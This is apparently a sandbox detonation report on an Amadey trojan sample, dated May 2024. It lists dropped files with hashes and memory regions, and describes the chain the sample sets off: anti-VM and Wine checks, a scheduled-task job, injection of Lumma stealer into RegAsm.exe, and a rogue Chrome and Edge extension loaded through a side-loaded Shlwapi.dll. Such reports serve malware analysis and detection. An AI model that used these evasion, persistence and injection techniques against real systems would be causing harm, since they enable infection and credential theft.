memory/3740-2-0x0000000000691000-0x00000000006BF000-memory.dmp

memory/3740-3-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3740-5-0x0000000000690000-0x0000000000B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 f6986f363dde0d5f374abd0a1dac252b
SHA1 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201

memory/3740-17-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3112-18-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-19-0x0000000000021000-0x000000000004F000-memory.dmp

memory/3112-20-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-21-0x0000000000020000-0x00000000004F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

MD5 ccb630a81a660920182d1c74b8db7519
SHA1 7bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256 a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA512 8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/3680-83-0x0000000000950000-0x0000000000951000-memory.dmp

memory/1436-86-0x0000000000400000-0x0000000000455000-memory.dmp

memory/1436-82-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3680-81-0x0000000000950000-0x0000000000951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat

MD5 f79d850a439815f276773a85f654511d
SHA1 42c4b202b7122ce48bb17975cf0a5be337d09fec
SHA256 31b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
SHA512 5ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c

memory/4916-88-0x0000000002A50000-0x0000000002A86000-memory.dmp

memory/4916-89-0x0000000005160000-0x0000000005788000-memory.dmp

memory/4916-90-0x0000000005790000-0x00000000057B2000-memory.dmp

memory/4916-91-0x0000000005930000-0x0000000005996000-memory.dmp

memory/4916-92-0x00000000059A0000-0x0000000005A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kofvsthe.xri.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4916-102-0x0000000005A10000-0x0000000005D64000-memory.dmp

memory/4916-103-0x0000000005FF0000-0x000000000600E000-memory.dmp

memory/4916-104-0x0000000006030000-0x000000000607C000-memory.dmp

memory/4916-105-0x0000000007630000-0x0000000007CAA000-memory.dmp

memory/4916-106-0x00000000064E0000-0x00000000064FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/3000-119-0x0000000006300000-0x0000000006654000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 58b91f03dfc4cf14af464d97ede94660
SHA1 ee65d8bbed1a2599db87825126549af9bb905e98
SHA256 609b4f96bd072252827a12871f585426d219fb7e51430e339fcee44ef3e2f74f
SHA512 b942f447ffb08149711def4281e87f5a9234271a6e2b198802f1560cbea4385e72e593bbdabc4e984f2bf520b55a28be03250f3668a0f8b00229000cf44965c9

C:\Users\Admin\AppData\Local\Temp\i0.exe

MD5 b80362872ea704846e892f16aab924c3
SHA1 222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256 d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512 beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

memory/3672-125-0x0000000000400000-0x00000000004E9000-memory.dmp

memory/4548-129-0x00000000058A0000-0x0000000005BF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp

MD5 bdf5432c7470916ab3c25f031c4c8d76
SHA1 4762eeae811cfad7449a3d13fb1d759932c6d764
SHA256 72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA512 33ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3081bd6181939301db545828ec689f19
SHA1 79c197e0c874f76999589e7f670cfbf4449140d3
SHA256 40e70d07d34f7e65cf9d8035bd0e575fd526e4f7d8765bfdebbfcd5143b089a6
SHA512 bc784dbeb23c34f4aebf99f2654e8db7c53689f5c903830ed9aad5e905884a7f882c9b1ffafb5683180a096897db2e0c8be9a0b122929788227492006dbf4756

memory/4548-143-0x0000000006440000-0x000000000648C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\chrome.zip

MD5 52311257a997455c0a32e1679e0b614e
SHA1 395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA256 50a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA512 19488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\js\background.js

MD5 432c4c1300ba1c077fbd681f9667a104
SHA1 33482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256 adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA512 0ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\icons\icon-34.png

MD5 ca00972a17d51a3e6a28cfc8711474e4
SHA1 c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256 fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA512 9731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\icons\icon-128.png

MD5 d57a101cf48bd00b5297596c081ece42
SHA1 47be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256 a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA512 7110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti\manifest.json

MD5 1d47eb945d1299c0e53bcada476d32b3
SHA1 509f9041f7e2a14402915feb4f2a739cfac5636b
SHA256 0a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA512 6d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dlls.manifest

MD5 963fb7657217be957d7d4732d892e55c
SHA1 593578a69d1044a896eb8ec2da856e94d359ef6b
SHA256 1d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512 f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\edge.zip

MD5 11a38af0ad330d95d2fb709612a44fa5
SHA1 bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA256 0d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA512 4bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\shlwapi.dll

MD5 4cac70c3fdb075424b58b220b4835c09
SHA1 651e43187c41994fd8f58f11d8011c4064388c89
SHA256 4094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512 810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963

memory/3112-347-0x0000000000020000-0x00000000004F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti.pem

MD5 261f4bbd673d2fabfcdc46bc6d3ed476
SHA1 ef4dcdf1d1a7b34ac6150eba577f359adec3cd38
SHA256 5116e02d1641a0d9c6faed1161c81befb05d8bc0d99f7854b237b3cd4761a5ea
SHA512 2d3550dee24cdf756a05083be3fec627089f7e5e4bc6ff9e304a82d03392a57f588fe5cd9cf2c51e6982e1ac199a1d61044b837db333ed01944f9e0b365affce

C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti.crx

MD5 931e9d91cc7969c1dcc0529135556b2f
SHA1 55c8efcf98411783fc351957cefbd3228882e99d
SHA256 0f9c5676c1f2db6aa3cbd378bef4719c7c86fce24200aa4d92ba6298291cf8a9
SHA512 9d1a0680c2c7a14169d896b7ce267ef3f67db79d897df1df3f5b06ab42e3addd7b013a5f0c5285d6aa816fa3c2644dc64c0f72e442c74ac7f1e24ae500685a15

memory/5076-371-0x0000000000400000-0x000000000072C000-memory.dmp

memory/3672-372-0x0000000000400000-0x00000000004E9000-memory.dmp

memory/3112-373-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-374-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-375-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-376-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/2260-378-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/2260-380-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-382-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-383-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-384-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-385-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-386-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-387-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/4748-390-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-391-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-392-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-393-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-394-0x0000000000020000-0x00000000004F2000-memory.dmp

memory/3112-395-0x0000000000020000-0x00000000004F2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 18:50

Reported

2024-05-19 18:52

Platform

win11-20240426-en

Max time kernel

143s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\shlwapi_p.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2056 set thread context of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\scoped_dir3048_1233145289\extension.zip C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\is-98D24.tmp C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1876 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4444 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4840 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 4444 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2056 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2968 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 1276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 4740 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp
PID 5020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3048 wrote to memory of 4120 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3048 wrote to memory of 4120 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5020 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp C:\Windows\system32\cmd.exe
